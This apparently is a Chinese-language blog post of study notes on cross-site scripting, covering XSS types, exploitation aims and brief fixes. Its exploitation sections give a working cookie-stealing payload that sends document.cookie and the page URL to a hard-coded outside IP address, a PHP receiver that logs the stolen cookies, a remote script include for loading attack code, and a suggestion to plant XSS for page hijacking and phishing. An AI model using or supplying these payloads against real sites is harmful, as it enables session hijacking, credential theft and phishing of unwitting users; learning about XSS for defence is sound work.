漏洞原理:接受输入数据,输出显示数据后解析执行
基础类型:反射 ( 非持续 ) ,存储 ( 持续 ) , DOM-BASE
拓展类型: jquery , mxss , uxss , pdfxss , flashxss ,上传 xss 等
常用标签: https://www.freebuf.com/articles/web/340080.html
攻击利用:盲打, COOKIE 盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等
安全修复:字符过滤,实例化编码, http_only , CSP 防护, WAF 拦截等
测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)
#XSS 跨站 - 攻击利用 - 凭据盗取
条件:无防护 Cookie 凭据获取
利用: XSS 平台或手写接受代码
触发: <script>var
url='http://47.94.236.117/getcookie.php?u='+window.location.href+
'&c='+document.cookie;document.write("<img src="+url+"
/>");</script>
接受:
<?php
url=_GET'u';
cookie=_GET'c';
fp = fopen('cookie.txt',"a");
fwrite(fp,url."\|".cookie."\n");
fclose($fp);
?>
#XSS 跨站 - 攻击利用 - 数据提交
条件:熟悉后台业务功能数据包,利用 JS 写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时执行其他
然后再写<script src="http://xx.xxx.xxx/poc.js"></script>
也可以主动钓鱼 比如 在自己博客放xss语句 然后进行页面劫持
XSS 跨站&Cookie 盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
我最厉害。,。2025-04-17 13:14
相关推荐
xiaohaiAIgeo1 小时前
【2026年】医药研发实验室GLP的通风设计要求:稳定性可验证性与合规性翼龙云_cloud2 小时前
亚马逊云渠道代理商:VPC 教程 利用 EC2 自建 NAT 实例降低私有子网出网成本xiaoye-duck2 小时前
《Linux网络编程》UDP Socket 编程实战:从 Echo 回显、通用字典服务到套接字封装全流程酒神dnspup2 小时前
CDN 回源检测怎么做?用 DNSPup 验证节点命中、源站暴露与多地可用性Rain的Java大神之路3 小时前
短信接口被狂刷怎么处理江南风月3 小时前
3分钟快速上手日志审计系统 WGLOG v2.2 更新了什么Dawn-bit4 小时前
Linux网络进阶:TCP三次握手和四次挥手与TCP连接状态FinelyYang4 小时前
UniApp + LiveKit:Android 端为什么要用原生做屏幕共享,以及我们怎么落地的蓝速科技4 小时前
蓝速科技信创落地:平衡安全合规与项目成本的实战方案TheBestRucy4 小时前
Python 九阳神功:从零筑基到线程飞升